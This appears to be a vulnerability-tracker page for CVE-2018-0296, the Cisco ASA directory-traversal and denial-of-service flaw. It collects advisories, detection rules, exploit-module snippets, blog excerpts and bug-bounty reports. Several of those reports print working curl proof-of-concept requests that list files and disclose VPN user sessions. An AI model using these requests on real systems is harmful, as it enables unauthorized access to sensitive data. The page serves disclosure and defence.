CVE-2018-0296
published 2018-06-07CVE-2018-0296: A vulnerability in the web interface of the Cisco Adaptive Security Appliance (ASA) could allow an unauthenticated, remote attacker to cause an affected device…
PriorityP187high7.5CVSS 3.1
AVNACLPRNUINSUCNINAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2022-05-03
Exploited in the wild
EPSS
99.90%
100.0th percentile
A vulnerability in the web interface of the Cisco Adaptive Security Appliance (ASA) could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition. It is also possible on certain software releases that the ASA will not reload, but an attacker could view sensitive system information without authentication by using directory traversal techniques. The vulnerability is due to lack of proper input validation of the HTTP URL. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. An exploit could allow the attacker to cause a DoS condition or unauthenticated disclosure of information. This vulnerability applies to IPv4 and IPv6 HTTP traffic. This vulnerability affects Cisco ASA Software and Cisco Firepower Threat Defense (FTD) Software that is running on the following Cisco products: 3000 Series Industrial Security Appliance (ISA), ASA 1000V Cloud Firewall, ASA 5500 Series Adaptive Security Appliances, ASA 5500-X Series Next-Generation Firewalls, ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers, Adaptive Security Virtual Appliance (ASAv), Firepower 2100 Series Security Appliance, Firepower 4100 Series Security Appliance, Firepower 9300 ASA Security Module, FTD Virtual (FTDv). Cisco Bug IDs: CSCvi16029.
Affected
14 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cisco | adaptive_security_appliance_software | >= 9.1 < 9.1.7.29 | 9.1.7.29 |
| cisco | adaptive_security_appliance_software | >= 9.2 < 9.2.4.33 | 9.2.4.33 |
| cisco | adaptive_security_appliance_software | >= 9.3 < 9.4.4.18 | 9.4.4.18 |
| cisco | adaptive_security_appliance_software | >= 9.5 < 9.6.4.8 | 9.6.4.8 |
| cisco | adaptive_security_appliance_software | >= 9.7 < 9.7.1.24 | 9.7.1.24 |
| cisco | adaptive_security_appliance_software | >= 9.8 < 9.8.2.28 | 9.8.2.28 |
| cisco | adaptive_security_appliance_software | >= 9.9 < 9.9.2.1 | 9.9.2.1 |
| cisco | adaptive_security_appliance_web_services | — | — |
| cisco | firepower_threat_defense | — | — |
| cisco | firepower_threat_defense | — | — |
| cisco | firepower_threat_defense | — | — |
| cisco | firepower_threat_defense | — | — |
| cisco | firepower_threat_defense | >= 6.0 < 6.1.0 | 6.1.0 |
| cisco | firepower_threat_defense | >= 6.2.1 < 6.2.2.3 | 6.2.2.3 |
Detection & IOCsextracted from sources · hover to see the quote
snort↗
46897
- →Run 'show asp table socket | include SSL|DTLS' on the ASA/Firepower device; any listening sockets indicate potential for exploitation. ↗
- →Run 'show processes | include Unicorn' on the ASA/Firepower device; if the Unicorn process is running, the likelihood of vulnerability is elevated. ↗
- →Check Point IPS blade detects exploitation attempts under the signature name 'Cisco Adaptive Security Appliance Web Services Denial of Service'. ↗
- →The exploit involves sending a specially crafted HTTP request containing directory traversal sequences to the ASA/Firepower web interface; monitor HTTP traffic to ASA management interfaces for directory traversal patterns. ↗
- ·Not all ASA/Firepower appliances are vulnerable; exploitation requires the web framework to be exposed. Only devices with SSL/DTLS listening sockets AND the Unicorn process running are at elevated risk. ↗
- ·On certain software releases the ASA will not reload (no DoS), but directory traversal for unauthenticated information disclosure is still possible — detection/response posture should account for both outcomes. ↗
- ·The vulnerability applies to both IPv4 and IPv6 HTTP traffic, so monitoring should cover both protocol families on the management interface. ↗
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:N/I:N/A:P
vulncheck7.5HIGH
cisa7.5HIGH
vendor_cisco8.6HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA
Cisco Adaptive Security Appliance (ASA) Denial-of-Service Vulnerability
cisa·2021-11-03·CVSS 7.5
CVE-2018-0296 [HIGH] CWE-20 Cisco Adaptive Security Appliance (ASA) Denial-of-Service Vulnerability
Vulnerability: Cisco Adaptive Security Appliance (ASA) Denial-of-Service Vulnerability
Affected: Cisco Adaptive Security Appliance (ASA)
Cisco Adaptive Security Appliance (ASA) contains an improper input validation vulnerability with HTTP URLs. Exploitation could allow an attacker to cause a denial-of-service (DoS) condition or information disclosure.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2018-0296
Remediation Due Date: 2022-05-03
CISA ICS
Rockwell Automation Allen-Bradley Stratix 5950
cisa_ics·2018-07-03·CVSS 8.6
[HIGH] Rockwell Automation Allen-Bradley Stratix 5950
## Archived Content In an effort to keep CISA.gov current, the archive contains outdated information that may not reflect current policy or programs.
ICS Advisory
##
Rockwell Automation Allen-Bradley Stratix 5950
Last RevisedJuly 03, 2018
Alert CodeICSA-18-184-01
## 1. EXECUTIVE SUMMARY
-
CVSS v3 8.6
- ATTENTION: Exploitable remotely/low skill level to exploit
- Vendor: Rockwell Automation
- Equipment: Allen-Bradley Stratix 5950
- Vulnerabilities: Improper Input Validation, Improper Certificate Validation, Resource Management Errors
## 2. RISK EVALUATION
Successful exploitation of these vulnerabilities could allow an attacker to bypass client certification to create connections to the affected device or cause the device to crash.
## 3
Cisco
Cisco Adaptive Security Appliance Web Services Denial of Service Vulnerability
vendor_cisco·2018-06-06·CVSS 8.6
CVE-2018-0296 [HIGH] CWE-20 Cisco Adaptive Security Appliance Web Services Denial of Service Vulnerability
Cisco Adaptive Security Appliance Web Services Denial of Service Vulnerability
A vulnerability in the web interface of the Cisco Adaptive Security Appliance (ASA) could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition. It is also possible on certain software releases that the ASA will not reload, but an attacker could view sensitive system information without authentication by using directory traversal techniques.
The vulnerability is due to lack of proper input validation of the HTTP URL. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. An exploit could allow the attacker to cause a DoS condition or unauthenticated disclosure of information.
Cisco
Cisco Adaptive Security Appliance Web Services Denial of Service Vulnerability
vendor_cisco·CVSS 3.0
CVE-2018-0296 Cisco Adaptive Security Appliance Web Services Denial of Service Vulnerability
CVE-2018-0296: Cisco Adaptive Security Appliance Web Services Denial of Service Vulnerability
A vulnerability in the web interface of the Cisco Adaptive Security Appliance (ASA) could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition. It is also possible on certain software releases that the ASA will not reload, but an attacker could view sensitive system information without authentication by using directory traversal techniques. The vulnerability is due to lack of proper input validation of the HTTP URL. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. An exploit could allow the attacker to cause a DoS condition or unauthenticated disclosure of
GHSA
GHSA-h2mj-pqgp-xmmj: A vulnerability in the web interface of the Cisco Adaptive Security Appliance (ASA) could allow an unauthenticated, remote attacker to cause an affect
ghsa_unreviewed·2022-05-13
CVE-2018-0296 [HIGH] CWE-20 GHSA-h2mj-pqgp-xmmj: A vulnerability in the web interface of the Cisco Adaptive Security Appliance (ASA) could allow an unauthenticated, remote attacker to cause an affect
A vulnerability in the web interface of the Cisco Adaptive Security Appliance (ASA) could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition. It is also possible on certain software releases that the ASA will not reload, but an attacker could view sensitive system information without authentication by using directory traversal techniques. The vulnerability is due to lack of proper input validation of the HTTP URL. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. An exploit could allow the attacker to cause a DoS condition or unauthenticated disclosure of information. This vulnerability applies to IPv4 and IPv6 HTTP traffic. This vulnerability affe
VulnCheck
Cisco Adaptive Security Appliance (ASA) Denial-of-Service Vulnerability
vulncheck·2018·CVSS 7.5
CVE-2018-0296 [HIGH] CWE-20 Cisco Adaptive Security Appliance (ASA) Denial-of-Service Vulnerability
Cisco Adaptive Security Appliance (ASA) Denial-of-Service Vulnerability
Cisco Adaptive Security Appliance (ASA) contains an improper input validation vulnerability with HTTP URLs. Exploitation could allow an attacker to cause a denial-of-service (DoS) condition or information disclosure.
Affected: Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD)
Required Action: Apply updates per vendor instructions.
Exploitation References: https://blog.talosintelligence.com/2019/04/seaturtle.html; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-15&host_type=src&vulnerability=cve-2018-0296; https://dashboard.shadowserver.org/statistics/honeypot/vulnerabil
Suricata
ET EXPLOIT Cisco Adaptive Security Appliance - Path Traversal
suricata·2018-06-29
CVE-2018-0296 ET EXPLOIT Cisco Adaptive Security Appliance - Path Traversal
ET EXPLOIT Cisco Adaptive Security Appliance - Path Traversal
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT Cisco Adaptive Security Appliance - Path Traversal"; flow:established,to_server; http.uri; content:"+CSCOE+/files/file_list.json?path=+CSCOE+"; fast_pattern; http.uri.raw; content:"../"; reference:url,exploit-db.com/exploits/44956/; reference:cve,2018-0296; classtype:attempted-user; sid:2025764; rev:3; metadata:affected_product Cisco_ASA, created_at 2018_06_29, cve CVE_2018_0296, deployment Perimeter, deployment Internal, deployment Datacenter, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_11_26, mitre_tactic_id TA0007, mitre_tactic_name Discovery, mitre_technique_id T1083, mitre_technique_name File_A
Exploit-DB
Cisco Adaptive Security Appliance - Path Traversal (Metasploit)
exploitdb·2019-08-12·CVSS 7.5
CVE-2018-0296 [HIGH] Cisco Adaptive Security Appliance - Path Traversal (Metasploit)
Cisco Adaptive Security Appliance - Path Traversal (Metasploit)
---
require 'msf/core'
class MetasploitModule "Cisco Adaptive Security Appliance - Path Traversal",
'Description' => %q{
Cisco Adaptive Security Appliance - Path Traversal (CVE-2018-0296)
A security vulnerability in Cisco ASA that would allow an attacker to view sensitive system information without authentication by using directory traversal techniques.
Google Dork:inurl:+CSCOE+/logon.html
},
'License' => MSF_LICENSE,
'Author' =>
[
'Yassine Aboukir', #Initial discovery
'Angelo Ruwantha @h3llwings' #msf module
],
'References' =>
[
['EDB', '44956'],
['URL', 'https://www.exploit-db.com/exploits/44956/']
],
'Arch' => ARCH_CMD,
'Compat' =>
{
'PayloadType' => 'cmd'
},
'Platform' => ['unix','linux'],
'Targets' =>
[
['3000 Series I
Exploit-DB
Cisco Adaptive Security Appliance - Path Traversal
exploitdb·2018-06-28·CVSS 7.5
CVE-2018-0296 [HIGH] Cisco Adaptive Security Appliance - Path Traversal
Cisco Adaptive Security Appliance - Path Traversal
---
'''
Cisco Adaptive Security Appliance - Path Traversal (CVE-2018-0296)
A security vulnerability in Cisco ASA that would allow an attacker to view sensitive system information without authentication by using directory traversal techniques.
Vulnerable Products
This vulnerability affects Cisco ASA Software and Cisco Firepower Threat Defense (FTD) Software that is running on the following Cisco products:
3000 Series Industrial Security Appliance (ISA)
ASA 1000V Cloud Firewall
ASA 5500 Series Adaptive Security Appliances
ASA 5500-X Series Next-Generation Firewalls
ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers
Adaptive Security Virtual Appliance (ASAv)
Firepower 2100 Series Security Appliance
F
Nuclei
Cisco ASA - Local File Inclusion
nuclei·CVSS 7.5
CVE-2018-0296 [HIGH] Cisco ASA - Local File Inclusion
Cisco ASA - Local File Inclusion
Cisco Adaptive Security Appliances (ASA) web interfaces could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition. It is also possible on certain software releases that the ASA will not reload, but an attacker could view sensitive system information without authentication by using directory traversal techniques. The vulnerability is due to lack of proper input validation of the HTTP URL. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. An exploit could allow the attacker to cause a DoS condition or unauthenticated disclosure of information. This vulnerability applies to IPv4 and IPv6 HTTP traffic. This vulnerabilit
Metasploit
Cisco ASA Directory Traversal
metasploit
Cisco ASA Directory Traversal
Cisco ASA Directory Traversal
This module exploits a directory traversal vulnerability in Cisco's Adaptive Security Appliance (ASA) software and Firepower Threat Defense (FTD) software. It lists the contents of Cisco's VPN web service which includes directories, files, and currently logged in users.
Nuclei
Cisco ASA Security Checks
nuclei·CVSS 7.5
CVE-2020-3187 [HIGH] Cisco ASA Security Checks
Cisco ASA Security Checks
A simple workflow that runs all Cisco ASA related nuclei templates on a given target.
Template:
id: cisco-asa-workflow
info:
name: Cisco ASA Security Checks
author: flag007
description: A simple workflow that runs all Cisco ASA related nuclei templates on a given target.
workflows:
- template: http/exposed-panels/cisco/cisco-asa-panel.yaml
subtemplates:
- template: http/cves/2020/CVE-2020-3187.yaml
- template: http/cves/2020/CVE-2020-3452.yaml
- template: http/cves/2018/CVE-2018-0296.yaml
Talos
IR Trends: Ransomware on the rise, while technology becomes most targeted sector
blogs_talos·2024-07-25
IR Trends: Ransomware on the rise, while technology becomes most targeted sector
## IR Trends: Ransomware on the rise, while technology becomes most targeted sector
Business email compromise (BEC) and ransomware were the top threats observed by Cisco Talos Incident Response (Talos IR) in the second quarter of 2024, together accounting for 60 percent of engagements.
Although there was a decrease in BEC engagements from last quarter , it was still a major threat for the second quarter in a row. There was a slight increase in ransomware where Talos IR responded to Mallox and Underground Team ransomware for the first time this quarter, as well as the previously seen Black Basta and BlackSuit ransomware operations.
For the third quarter in a row, the most observed means of gaining initial access was the use of compromised credentials on valid accounts, which accounted fo
Talos
IR Trends: Ransomware on the rise, while technology becomes most targeted sector
blogs_talos·2024-07-25
IR Trends: Ransomware on the rise, while technology becomes most targeted sector
Business email compromise (BEC) and ransomware were the top threats observed by Cisco Talos Incident Response (Talos IR) in the second quarter of 2024, together accounting for 60 percent of engagements.
Although there was a decrease in BEC engagements from last quarter, it was still a major threat for the second quarter in a row. There was a slight increase in ransomware where Talos IR responded to Mallox and Underground Team ransomware for the first time this quarter, as well as the previously seen Black Basta and BlackSuit ransomware operations.
For the third quarter in a row, the most observed means of gaining initial access was the use of compromised credentials on valid accounts, which accounted for 60 percent of engagements this quarter, a 25 percent increase from the previous quar
Tenable
Critical Vulnerabilities You Need to Find and Fix to Protect the Remote Workforce
blogs_tenable·2020-04-13
Critical Vulnerabilities You Need to Find and Fix to Protect the Remote Workforce
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Management (CSPM)
Compliance
Cyber insurance
Data Security Posture Management (DSPM)
Google Cloud security
Infrastructure as Code (IaC) security
Kubernetes Security Pos
Tenable
CVE-2018-0296: Vulnerability in Cisco ASA and Firepower Appliances Sees Spike in Exploit Attempts
blogs_tenable·2019-12-23·CVSS 7.5
[HIGH] CVE-2018-0296: Vulnerability in Cisco ASA and Firepower Appliances Sees Spike in Exploit Attempts
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Checkpoint
23rd December – Threat Intelligence Bulletin
blogs_checkpoint·2019-12-23
CVE-2018-0296 23rd December – Threat Intelligence Bulletin
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 23rd December – Threat Intelligence Bulletin
For the latest discoveries in cyber research for the week of 23rd December 2019, please download our Threat Intelligence Bulletin .
Top attacks and breaches
An Emotet infection has caused Frankfurt to shut down its IT network, to refrain from the malware being used to launch a ransomware attack. Also in Germany, the federal cybersecurity agency has issued a warning about Emotet , following a campaign that included emails supposedly sent from the German federal author
Talos
Cisco ASA DoS bug attacked in wild
blogs_talos·2019-12-20·CVSS 7.5
CVE-2018-0296 [HIGH] Cisco ASA DoS bug attacked in wild
By Nick Biasini.
Cisco Talos has recently noticed a sudden spike in exploitation attempts against a specific vulnerability in our Cisco Adaptive Security Appliance (ASA) and Firepower Appliance. The vulnerability, CVE-2018-0296, is a denial-of-service and information disclosure directory traversal bug found in the web framework of the appliance. The attacker can use a specially crafted URL to cause the ASA appliance to reboot or disclose unauthenticated information.
This vulnerability was first noticed being exploited publicly back in June 2018, but it appeared to increase in frequency in the past several days and weeks. As such, we are advising all customers to ensure they are running a non-affected version of code. Additionally, we want to highlight that there is a Snort signature in p
Talos
Cisco ASA DoS bug attacked in wild
blogs_talos·2019-12-20·CVSS 7.5
CVE-2018-0296 [HIGH] Cisco ASA DoS bug attacked in wild
## Cisco ASA DoS bug attacked in wild
By Nick Biasini .
Cisco Talos has recently noticed a sudden spike in exploitation attempts against a specific vulnerability in our Cisco Adaptive Security Appliance (ASA) and Firepower Appliance. The vulnerability, CVE-2018-0296 , is a denial-of-service and information disclosure directory traversal bug found in the web framework of the appliance. The attacker can use a specially crafted URL to cause the ASA appliance to reboot or disclose unauthenticated information.
This vulnerability was first noticed being exploited publicly back in June 2018 , but it appeared to increase in frequency in the past several days and weeks. As such, we are advising all customers to ensure they are running a non-affected version of code. Additionally, we want to high
Tenable
Sea Turtle DNS Hijacking Campaign Utilizes At Least Seven Patched Vulnerabilities
blogs_tenable·2019-04-19
Sea Turtle DNS Hijacking Campaign Utilizes At Least Seven Patched Vulnerabilities
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Talos
DNS Hijacking Abuses Trust In Core Internet Service
blogs_talos·2019-04-17
DNS Hijacking Abuses Trust In Core Internet Service
By Danny Adamitis, David Maynor, Warren Mercer, Matthew Olney and Paul Rascagneres.
Update 4/18: A correction has been made to our research based on feedback from Packet Clearing House, we thank them for their assistance
## Preface
This blog post discusses the technical details of a state-sponsored attack manipulating DNS systems. While this incident is limited to targeting primarily national security organizations in the Middle East and North Africa, and we do not want to overstate the consequences of this specific campaign, we are concerned that the success of this operation will lead to actors more broadly attacking the global DNS system. DNS is a foundational technology supporting the Internet. Manipulating that system has the potential to undermine the trust users have on the inter
Talos
DNS Hijacking Abuses Trust In Core Internet Service
blogs_talos·2019-04-17
DNS Hijacking Abuses Trust In Core Internet Service
## DNS Hijacking Abuses Trust In Core Internet Service
By Danny Adamitis , David Maynor , Warren Mercer , Matthew Olney and Paul Rascagneres . Update 4/18: A correction has been made to our research based on feedback from Packet Clearing House, we thank them for their assistance
## Preface
This blog post discusses the technical details of a state-sponsored attack manipulating DNS systems. While this incident is limited to targeting primarily national security organizations in the Middle East and North Africa, and we do not want to overstate the consequences of this specific campaign, we are concerned that the success of this operation will lead to actors more broadly attacking the global DNS system. DNS is a foundational technology supporting the Internet. Manipulating that system has t
Tenable
Cisco March Advisory Addresses Multiple Vulnerabilities in FXOS and NX-OS
blogs_tenable·2019-03-07
Cisco March Advisory Addresses Multiple Vulnerabilities in FXOS and NX-OS
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
Cisco ASA Exploited in the Wild; FXOS, NX-OS Get High-Priority Patches
blogs_tenable·2018-06-26·CVSS 7.5
CVE-2018-0296 [HIGH] Cisco ASA Exploited in the Wild; FXOS, NX-OS Get High-Priority Patches
Blog / Cyber Exposure Alerts
Subscribe
# Cisco ASA Exploited in the Wild; FXOS, NX-OS Get High-Priority Patches
Steve Tilson
June 26, 2018
3 Min Read
Cisco released a high-severity patch update for CVE-2018-0296 on June 22 which affects the Adaptive Security Appliance (ASA). There’s no time to waste in deploying this patch, as the company’s advisory notes it is currently being exploited in the wild.
The ASA patch, which addresses the lack of proper input validation of the HTTP URL, is the latest in a long list of updates from Cisco this month. A slew of patches were issued June 6, followed by a whopping 34 patches on June 20, including five critical and 19 high-severity patches for its Firepower firewalls (FXOS) and Nexus switches (NX-OS). Another 10 medium-severity fixes also were i
Tenable
Cisco ASA Exploited in the Wild; FXOS, NX-OS Get High-Priority Patches
blogs_tenable·2018-06-26
Cisco ASA Exploited in the Wild; FXOS, NX-OS Get High-Priority Patches
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Greynoiseio
NoiseLetter September 2025
blogs_greynoiseio
NoiseLetter September 2025
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
HackerOne
CVE-2010-1429 JBoss Insecure Storage of Sensitive Information on ips.mtn.co.ug
hackerone·2024-08-30·CVSS 5.0
CVE-2010-1429 [MEDIUM] CVE-2010-1429 JBoss Insecure Storage of Sensitive Information on ips.mtn.co.ug
CVE-2010-1429 JBoss Insecure Storage of Sensitive Information on ips.mtn.co.ug
## Summary:
Red Hat JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) 4.2 before 4.2.0.CP09 and 4.3 before 4.3.0.CP08 allows remote attackers to obtain sensitive information about "deployed web contexts" via a request to the status servlet, as demonstrated by a full=true query string. this issue exists because of a CVE-2008-3273 regression. by requesting the Status param and sitting its value to true, Jobss will print a sensitive information such as Memory used/Total Memory / Client IP address.
## Proof of concept
1. Navigate intercept / visit hostserver on https://h30f.n1.ips.mtn.co.ug/status?full=true
1. You can see on the page is sensitive has exposed
1. Bellow of vulnerable code
```java
#inc
HackerOne
CVE-2018-0296 Cisco ASA Denial of Service & Path Traversal vulnerable on [mtn.co.ug]
hackerone·2024-08-30·CVSS 7.5
CVE-2018-0296 [HIGH] CVE-2018-0296 Cisco ASA Denial of Service & Path Traversal vulnerable on [mtn.co.ug]
CVE-2018-0296 Cisco ASA Denial of Service & Path Traversal vulnerable on [mtn.co.ug]
## Summary:
A vulnerability in the web interface of the Cisco Adaptive Security Appliance (ASA) could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition. It is also possible on certain software releases that the ASA will not reload, but an attacker could view sensitive system information without authentication by using directory traversal techniques. The vulnerability is due to lack of proper input validation of the HTTP URL. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. An exploit could allow the attacker to cause a DoS condition or unauthenticated disclosure
HackerOne
[CVE-2018-0296] Cisco VPN path traversal on the https://███████/ (██████)
hackerone·2024-07-19·CVSS 7.5
CVE-2018-0296 [HIGH] [CVE-2018-0296] Cisco VPN path traversal on the https://███████/ (██████)
[CVE-2018-0296] Cisco VPN path traversal on the https://███████/ (██████)
##Description
I discovered previously unidentified instance https://████/ (███████) in ██████████ network, vulnerable to the CVE-2018-0296 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0296)
##POC
```
curl -i -k "https://████████/+CSCOU+/../+CSCOE+/files/file_list.json" --path-as-is
```
███
We can disclose user sessions by quering /sessions:
```
curl -i -k "https://████/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions" --path-as-is
```
##Suggested fix
Updating to the latest version should fix the issue. Fixed version should give 404 "File not found" error.
Example of patched version:
```
curl -i -k "https://█████████.███████.mil/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions" --path-as-
HackerOne
[CVE-2018-0296] Cisco VPN path traversal on the https://1████████ (https://████████.███.████████/)
hackerone·2024-07-19·CVSS 7.5
CVE-2018-0296 [HIGH] [CVE-2018-0296] Cisco VPN path traversal on the https://1████████ (https://████████.███.████████/)
[CVE-2018-0296] Cisco VPN path traversal on the https://1████████ (https://████████.███.████████/)
##Description
I discovered previously unidentified instance https://1███████ in ████████ network, vulnerable to the CVE-2018-0296 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0296)
##POC
```
curl -i -k "https://1████/+CSCOU+/../+CSCOE+/files/file_list.json" --path-as-is
```
████████
We can disclose user sessions by quering /sessions:
```
curl -i -k "https://1█████/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions" --path-as-is
```
##Suggested fix
Updating to the latest version should fix the issue. Fixed version should give 404 "File not found" error.
Example of patched version:
```
curl -i -k "https://███.████.█████/+CSCOU+/../+CSCOE+/files/file_list.json?path=/session
HackerOne
[CVE-2018-0296] Cisco VPN path traversal on the https://███ (████████████████)
hackerone·2024-07-19·CVSS 7.5
CVE-2018-0296 [HIGH] [CVE-2018-0296] Cisco VPN path traversal on the https://███ (████████████████)
[CVE-2018-0296] Cisco VPN path traversal on the https://███ (████████████████)
##Description
I discovered previously unidentified instance https://█████ (█████████████) in ██████ network, vulnerable to the CVE-2018-0296 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0296)
##POC
```
curl -i -k "https://███/+CSCOU+/../+CSCOE+/files/file_list.json" --path-as-is
```
█████
We can disclose user sessions by quering /sessions:
```
curl -i -k "https://███████/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions" --path-as-is
```
##Suggested fix
Updating to the latest version should fix the issue. Fixed version should give 404 "File not found" error.
Example of patched version:
```
curl -i -k "https://█████.████.█████████/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions" --pa
HackerOne
[CVE-2018-0296] Cisco VPN path traversal on the https://████████/ (no hostname)
hackerone·2024-07-19·CVSS 7.5
CVE-2018-0296 [HIGH] [CVE-2018-0296] Cisco VPN path traversal on the https://████████/ (no hostname)
[CVE-2018-0296] Cisco VPN path traversal on the https://████████/ (no hostname)
##Description
I discovered previously unidentified instance https://██████████/ in ██████████ network, vulnerable to the CVE-2018-0296 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0296)
##POC
```
curl -i -k "https://██████/+CSCOU+/../+CSCOE+/files/file_list.json" --path-as-is
```
█████████
We can disclose user sessions by quering /sessions:
```
curl -i -k "https://████████/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions" --path-as-is
```
##Suggested fix
Updating to the latest version should fix the issue. Fixed version should give 404 "File not found" error.
Example of patched version:
```
curl -i -k "https://███████.███████.mil/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions" --
HackerOne
[CVE-2018-0296] Cisco VPN path traversal on the https://███████/ (████.███.mil)
hackerone·2024-06-18·CVSS 7.5
CVE-2018-0296 [HIGH] [CVE-2018-0296] Cisco VPN path traversal on the https://███████/ (████.███.mil)
[CVE-2018-0296] Cisco VPN path traversal on the https://███████/ (████.███.mil)
##Description
I discovered previously unidentified instance https://█████████ (████.██████.mil) in █████████ network, vulnerable to the CVE-2018-0296 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0296)
##POC
```
curl -i -k "https://████/+CSCOU+/../+CSCOE+/files/file_list.json" --path-as-is
```
█████████
We can disclose user sessions by quering /sessions:
```
curl -i -k "https://█████/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions" --path-as-is
```
##Suggested fix
